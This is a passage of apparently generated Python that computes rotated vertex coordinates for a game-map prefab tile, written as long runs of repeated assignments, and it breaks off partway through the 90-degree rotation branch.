y121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z121 = level*448 + 309
x122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[0])
y122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 180)[1])
z122 = level*448 + 309
x123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y123 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z123 = level*448 + 309
x124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y124 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z124 = level*448 + 64
x125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[0])
y125 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[1])
z125 = level*448 + 64
x126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y126 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z126 = level*448 + 64
x127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y127 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z127 = level*448 + 309
x128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[0])
y128 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 180)[1])
z128 = level*448 + 64
x129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[0])
y129 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 180)[1])
z129 = level*448 + 64
x130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y130 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z130 = level*448 + 309
x131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[0])
y131 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 180)[1])
z131 = level*448 + 64
x132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[0])
y132 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 180)[1])
z132 = level*448 + 64
#INSERT_ROT_2_PY_LIST
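# rotation 3: the same prefab vertices as rotation 0, turned 90 degrees around the tile centre with rotatePoint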
elif rotation == 3:
x1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y1 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z1 = level*448 + 64
x2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[0])
y2 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[1])
z2 = level*448 + 64
x3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y3 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z3 = level*448 + 64
x4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y4 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z4 = level*448 + 0
x5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y5 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z5 = level*448 + 0
x6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[0])
y6 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[1])
z6 = level*448 + 0
x7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y7 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z7 = level*448 + 64
x8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y8 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z8 = level*448 + 64
x9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y9 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z9 = level*448 + 0
x10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[0])
y10 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[1])
z10 = level*448 + 0
x11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y11 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z11 = level*448 + 0
x12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y12 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z12 = level*448 + 64
x13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[0])
y13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[1])
z13 = level*448 + 64
x14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z14 = level*448 + 64
x15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z15 = level*448 + 0
x16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z16 = level*448 + 0
x17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z17 = level*448 + 0
x18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z18 = level*448 + 64
x19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[0])
y19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[1])
z19 = level*448 + 64
x20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z20 = level*448 + 64
x21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z21 = level*448 + 309
x22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[0])
y22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[1])
z22 = level*448 + 64
x23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z23 = level*448 + 64
x24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z24 = level*448 + 309
x25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[0])
y25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[1])
z25 = level*448 + 309
x26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z26 = level*448 + 309
x27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[0])
y27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[1])
z27 = level*448 + 309
x28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z28 = level*448 + 64
x29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[0])
y29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[1])
z29 = level*448 + 64
x30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z30 = level*448 + 64
x31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z31 = level*448 + 64
x32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[0])
y32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[1])
z32 = level*448 + 64
x33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[0])
y33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[1])
z33 = level*448 + 309
x34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z34 = level*448 + 309
x35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z35 = level*448 + 64
x36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z36 = level*448 + 64
x37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z37 = level*448 + 309
x38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z38 = level*448 + 64
x39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[0])
y39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[1])
z39 = level*448 + 64
x40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[0])
y40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[1])
z40 = level*448 + 64
x41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z41 = level*448 + 64
x42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z42 = level*448 + 320
x43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[0])
y43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[1])
z43 = level*448 + 64
x44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z44 = level*448 + 64
x45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z45 = level*448 + 320
x46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[0])
y46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[1])
z46 = level*448 + 320
x47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z47 = level*448 + 320
x48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[0])
y48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[1])
z48 = level*448 + 320
x49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z49 = level*448 + 64
x50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[0])
y50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[1])
z50 = level*448 + 64
x51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z51 = level*448 + 64
x52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z52 = level*448 + 320
x53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z53 = level*448 + 64
x54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[0])
y54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[1])
z54 = level*448 + 64
x55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z55 = level*448 + 320
x56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z56 = level*448 + 64
x57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[0])
y57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[1])
z57 = level*448 + 64
x58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z58 = level*448 + 309
x59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z59 = level*448 + 64
x60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[0])
y60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[1])
z60 = level*448 + 64
x61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[0])
y61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[1])
z61 = level*448 + 64
x62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z62 = level*448 + 64
x63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z63 = level*448 + 309
x64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z64 = level*448 + 309
x65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z65 = level*448 + 64
x66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z66 = level*448 + 64
x67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[0])
y67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[1])
z67 = level*448 + 309
x68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z68 = level*448 + 309
x69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z69 = level*448 + 309
x70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[0])
y70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[1])
z70 = level*448 + 64
x71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z71 = level*448 + 64
x72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z72 = level*448 + 64
x73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[0])
y73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[1])
z73 = level*448 + 309
x74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[0])
y74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[1])
z74 = level*448 + 64
x75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[0])
y75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[1])
z75 = level*448 + 64
x76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z76 = level*448 + 309
x77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z77 = level*448 + 64
x78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z78 = level*448 + 64
x79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z79 = level*448 + 64
x80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z80 = level*448 + 64
x81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z81 = level*448 + 309
x82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z82 = level*448 + 309
x83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z83 = level*448 + 309
x84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z84 = level*448 + 309
x85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z85 = level*448 + 64
x86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z86 = level*448 + 64
x87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z87 = level*448 + 64
x88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z88 = level*448 + 309
x89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z89 = level*448 + 64
x90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z90 = level*448 + 64
x91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z91 = level*448 + 64
x92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z92 = level*448 + 64
x93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z93 = level*448 + 309
x94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z94 = level*448 + 309
x95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z95 = level*448 + 64
x96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z96 = level*448 + 64
x97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z97 = level*448 + 309
x98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z98 = level*448 + 64
x99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
